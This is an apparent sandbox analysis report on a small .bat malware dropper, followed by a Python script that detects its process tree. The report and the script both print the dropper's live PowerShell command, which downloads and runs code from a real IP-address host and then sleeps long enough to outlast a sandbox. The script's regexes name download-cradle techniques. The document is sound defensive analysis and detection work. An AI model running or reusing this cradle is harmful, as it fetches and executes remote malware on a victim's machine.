Analysis
- max time kernel: 132s
- max time network: 69s
- platform: windows10_x64
- resource: win10v200430
- submitted: 15-05-2020 20:10
Static task: static1
Behavioral task: behavioral1
- Sample: 55022f44a9c2dac0916e9db3842398df.bat
- Resource: win7v200430 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: 55022f44a9c2dac0916e9db3842398df.bat
- Resource: win10v200430 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: 55022f44a9c2dac0916e9db3842398df.bat
- Size: 219B
- MD5: 07ea4461f7fc0758bb7fb455966df5d9
- SHA1: 2df15ea78ad89a7816a69bab5656274115bed854
- SHA256: dd540cd255b16f023dee940fffa52d054726d7f2c1c9aeaeafc4f594a3e2a5f1
- SHA512: b0ea53a6359157114b09bddf227d1bfedcd7db302c356e99e1086b736fc003b6a2f40647a6feecf6f5642104bbf8e7b9a49668c29a5f1c0857fcf1538419414d
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: URLs
- ps1.dropper: http://185.103.242.78/pastes/55022f44a9c2dac0916e9db3842398df
Signatures
- Program crash (1 IoC)
  Processes:
  pid | pid_target | process | target process
  2088 | 1576 | WerFault.exe | powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
  description | pid | process
  Token: SeRestorePrivilege | 2088 | WerFault.exe
  Token: SeBackupPrivilege | 2088 | WerFault.exe
  Token: SeDebugPrivilege | 2088 | WerFault.exe
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
  pid | process
  2088 | WerFault.exe (14 occurrences)
Processes
1. C:\Windows\system32\cmd.exe (PID 1312)
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\55022f44a9c2dac0916e9db3842398df.bat"
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1576)
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/55022f44a9c2dac0916e9db3842398df');Invoke-PJRBBLOXXKAL;Start-Sleep -s 10000"
      3. C:\Windows\SysWOW64\WerFault.exe (PID 2088)
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1576 -s 704
         - Program crash
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious behavior: EnumeratesProcesses
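The process tree above is the whole observable behaviour of this sample: a 219-byte .bat that starts the 32-bit (SysWOW64) PowerShell with an `IEX (New-Object System.Net.WebClient).DownloadString(...)` cradle pulling a paste from an IP-literal host, calls Invoke-PJRBBLOXXKAL (presumably defined by the downloaded script), and then sleeps for 10000 seconds, far longer than any sandbox run. PowerShell (PID 1576) then crashed, so all three signatures in the report belong to WerFault handling that crash, not to the payload; the downloaded second stage is not shown anywhere in the report. As an added example that is not part of this report or of the sandbox, the Python below runs the checks a detection engineer would write for this tree over process-creation records constructed from it; the record fields, tag names and the 600-second sleep threshold are my own assumptions.

```python
import re
from dataclasses import dataclass
from ipaddress import ip_address
from typing import Dict, List, Optional
from urllib.parse import urlparse


@dataclass
class ProcEvent:
    """One process-creation record (the fields a Sysmon Event ID 1 or a
    sandbox process tree provides). Field names are assumed, not the report's."""
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str


# Constructed from the report's process tree; parent links follow the tree
# nesting (cmd.exe -> powershell.exe -> WerFault.exe).
EVENTS = [
    ProcEvent(1312, None, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\55022f44a9c2dac0916e9db3842398df.bat"'),
    ProcEvent(1576, 1312, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/55022f44a9c2dac0916e9db3842398df');Invoke-PJRBBLOXXKAL;Start-Sleep -s 10000"'''),
    ProcEvent(2088, 1576, r"C:\Windows\SysWOW64\WerFault.exe",
              r"C:\Windows\SysWOW64\WerFault.exe -u -p 1576 -s 704"),
]

# IEX / Invoke-Expression fed by a .NET or PowerShell HTTP client.
CRADLE_RE = re.compile(
    r"(?i)\b(?:IEX|Invoke-Expression)\b.*?"
    r"(?:DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|Net\.WebClient)")
URL_RE = re.compile(r"(?i)https?://[^\s'\"();]+")
SLEEP_RE = re.compile(r"(?i)Start-Sleep\s+(?:-s(?:econds)?\s+)?(\d+)")
WERFAULT_RE = re.compile(r"(?i)\bWerFault\.exe\b.*?\s-p\s+(\d+)")
LONG_SLEEP_SECONDS = 600  # assumed threshold: longer than a typical sandbox run


def is_ip_literal(host: str) -> bool:
    """True when the URL host is a bare IPv4/IPv6 address rather than a name."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def analyze(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Return {pid: [tags]} for every process that trips at least one check."""
    by_pid = {e.pid: e for e in events}
    findings: Dict[int, List[str]] = {}
    for e in events:
        tags: List[str] = []
        image = e.image.lower()
        if image.endswith("powershell.exe"):
            if CRADLE_RE.search(e.cmdline):
                tags.append("download_cradle")
            if "\\syswow64\\" in image:          # 32-bit PowerShell on an x64 host
                tags.append("wow64_powershell")
            for url in URL_RE.findall(e.cmdline):
                if is_ip_literal(urlparse(url).hostname or ""):
                    tags.append("ip_literal_url:" + url)
            m = SLEEP_RE.search(e.cmdline)
            if m and int(m.group(1)) >= LONG_SLEEP_SECONDS:
                tags.append("long_sleep:%ss" % m.group(1))
            parent = by_pid.get(e.ppid)
            if parent and parent.image.lower().endswith("cmd.exe"):
                pc = parent.cmdline.lower()
                if ".bat" in pc and "\\appdata\\local\\temp\\" in pc:
                    tags.append("launched_by_temp_bat")
        elif image.endswith("werfault.exe"):
            # WerFault -p <pid> names the crashed process; tie it back to the cradle.
            m = WERFAULT_RE.search(e.cmdline)
            crashed = by_pid.get(int(m.group(1))) if m else None
            if crashed and crashed.image.lower().endswith("powershell.exe"):
                tags.append("powershell_crash:%d" % crashed.pid)
        if tags:
            findings[e.pid] = tags
    return findings


if __name__ == "__main__":
    for pid, tags in analyze(EVENTS).items():
        print(pid, ", ".join(tags))
```

Run stand-alone it prints five tags for PID 1576 and `powershell_crash:1576` for PID 2088; cmd.exe itself produces nothing, which is deliberate: the cradle, the IP-literal URL and the WOW64 host are the signals worth alerting on, and correlating the WerFault `-p` argument back to that process is what tells you the payload died rather than ran.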